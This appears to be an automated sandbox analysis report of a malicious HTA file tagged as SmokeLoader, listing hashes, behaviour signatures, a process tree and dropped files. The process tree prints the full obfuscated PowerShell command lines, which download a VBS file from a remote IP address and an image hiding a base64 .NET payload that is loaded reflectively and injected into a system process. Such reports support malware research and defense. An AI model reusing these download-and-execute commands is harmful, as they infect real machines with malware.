Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
09-01-2025 02:19
General
-
Target
4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073.hta
-
Size
108KB
-
MD5
b7bd51ea4a3cbb85901f5e467009beaa
-
SHA1
2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc
-
SHA256
4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073
-
SHA512
0d30af8454e5a74674e4f971e40a7c7781d0c29d48c25dd327b7bccad07f6208db24a078d8e03c07ae2bac7ac3ceba01b67668f7b3108456406c7a258fced032
-
SSDEEP
384:Fipci1dZ2FGFZrZi9qiA/zRj6TiezFSw4M7333j333V333x333kD333n33P333UM:zFLFSwkGpe1zOhVadsRZ4
Malware Config
Extracted
https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20
https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Smokeloader family
-
Blocklisted process makes network request 3 IoCs
-
Evasion via Device Credential Deployment 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eflii0p3\eflii0p3.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD91.tmp" "c:\Users\Admin\AppData\Local\Temp\eflii0p3\CSC3C3BF8F569494E0C8F32B998702D4784.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- Checks SCSI registry key(s)
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD52be89e378e1224db2e458efe68bf0f16
SHA1a644a6707018ae9ccf1a9f5ee6e11c4305f325b3
SHA2563b100d9ac5e38bdd9649aa462503eb637f42ec5cb1d7051166d1d9e79eaf84b8
SHA512b70a78f65d6b4ec20476666b220f4aaf946e2e5567b27f8aac7cb73bacba6a87d4f007ac23c89988450663db5f857b5119e428391c1180b5abd42e3f049d6f4b
-
Filesize
1KB
MD512206d534aac95353538bc08dfef8ceb
SHA178dab5f33c2bbb2c154d84f7ee3381411542eee3
SHA2568d67fb8a153c2a434d2b9da9a731f07401fdc1e12269fc1733d5ad47460427a1
SHA512069e913f25059e33338418ea799efb5aa2a623a0ae17f98c51fe848bb14fa14926745adc178e7276133d3200a4146815d76183bca2834d5532622968f4c16164
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD545aa64af6e2769c142ece4be2a40ad79
SHA105a33c56c24435a2eb694c5429b0ea9848083a67
SHA25664b74f4be479f9556863db5afb2bfca56359cc2fa7c4cc127520e34a99b77c26
SHA512ba79399d133039660b1b30dae9199a1d027c23d4ced83b73990cbfc5a40e65dea3abc494e4c2a745d5ba6afedd6652aa800a62db4f719ccb978fda211fdf81b2
-
Filesize
219KB
MD58ccd875893cd23b67d7c61ea735f5c52
SHA16171c7dd4f67a67fff0ca151c7e9a06104e00def
SHA25616328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392
SHA5123ceb06944fb1cb3f176e9163f761e3c2d97e72a9e0177f417d4a83e03f4b539fbcb2d7ebe53865a483cacdc8eaf16ce292245aed1cc60c207f7ca038ced07f31
-
Filesize
652B
MD5998e1a1a92953450bfd47dee0609e016
SHA1de0c3c56c1ce69bfd896ef40b4d1eb6a72f12236
SHA2569e12e5df6d52ac6e967837c337a8aa687e757da78debd9853e12c39c7be5b332
SHA51224b363832b641fb0c2fc010b75383dd2a3a420bf4b4deb2f865e890a78dc35c1cf7a2ad4cc0dcdfe5bd119953cf520ca3022e4210df9221f7e130454bac3e0c3
-
Filesize
478B
MD57836723690e40c9d8fbf78fbd248c066
SHA16a0f9fb57575624ad9ca54108abb75cb6b20fd3d
SHA256a1dd056c3c937dd2fef8d026745f706da97f13205feba1bdae492d4b2cad07a9
SHA51210c093f3aaef531e31196afcc50fe7d554eee7d49206046f0d0a6dd86f23ce73067a7b926b6acac810a5d33ecc98b605b1ff1e6eaf0d404a4c1d9265f8ac06a3
-
Filesize
369B
MD5e429add6636ec74497426e51a955aef9
SHA1b955f2ad64b3e54b0fd9da073e8fde2f246a82bd
SHA2566e512f27a02ff09aa3b0c885b0860ea1470859274017a472ae220ad7ac9e785f
SHA5122b4e344d4d3c90c1fc7b5c88e1e84207f08ca38b16a37dcd4579ff8d88fb325d9077e657ee90a789dc57e468bf4d4b38ed0b898b645089d8f2164ba6fd996d78
-
Filesize
3.3MB
-
Filesize
1.5MB
-
Filesize
624KB
-
Filesize
44KB
-
Filesize
40KB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
7.7MB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
3.3MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
216KB